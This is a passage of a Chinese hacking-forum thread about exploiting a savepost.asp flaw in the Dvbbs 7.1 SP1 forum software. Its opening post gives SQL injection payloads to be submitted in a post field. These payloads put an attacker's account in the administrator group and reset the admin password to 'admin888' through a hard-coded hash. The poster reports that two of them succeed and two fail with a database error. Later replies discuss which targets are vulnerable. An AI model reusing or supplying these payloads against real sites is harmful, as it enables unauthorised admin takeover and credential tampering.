28 12
发新话题
打印

[原创]对dvbbs7.1 sp1最新savepost.asp漏洞的研究和利用

复制内容到剪贴板
代码:
coolidea|||123',0);update/**/Dv_User/**/set/**/UserGroupID='1'/**/where[UserName]='用户ID';--
加入前台管理员组
复制内容到剪贴板
代码:
coolidea|||123',0);update/**/Dv_User/**/set/**/UserPassword='469e80d32c0559f8'/**/where[UserName]='admin';--
修改前台admin的密码为admin888

这两个都可以成功
复制内容到剪贴板
代码:
coolidea|||123',0);update/**/Dv_admin/**/set/**/UserGroupID='1'/**/where[UserName]='用户ID';--
加入后台管理员组
复制内容到剪贴板
代码:
coolidea|||123',0);update/**/Dv_admin/**/set/**/UserPassword='469e80d32c0559f8'/**/where[UserName]='admin';--
修改后台admin的密码为admin888
这两个怎么都不成功,发帖子提交的时候老是出现
引用:
Microsoft JET Database Engine 错误 '80040e14'

在 SQL 语句结尾之后找到字符。

/bbs/inc/Dv_ClsMain.asp,行1334
可以确定是sql的,因为在后台登陆页面那里显示是sql7.1版本的.

TOP

提示: 作者被禁止或删除 内容自动屏蔽

TOP

引用:
引用第26楼tpxyhedan于2007-10-04 15:30发表的 :
现在好象很难拿到吧。
试了2个没成功。
这说明了一个问题,很严重的问题---我太菜了。
继续学习
跟时间没问题
是跟你所找的目标的问题
假如存在漏洞 必然可以成功
以后类似帖子不要发了

TOP

 28 12
发新话题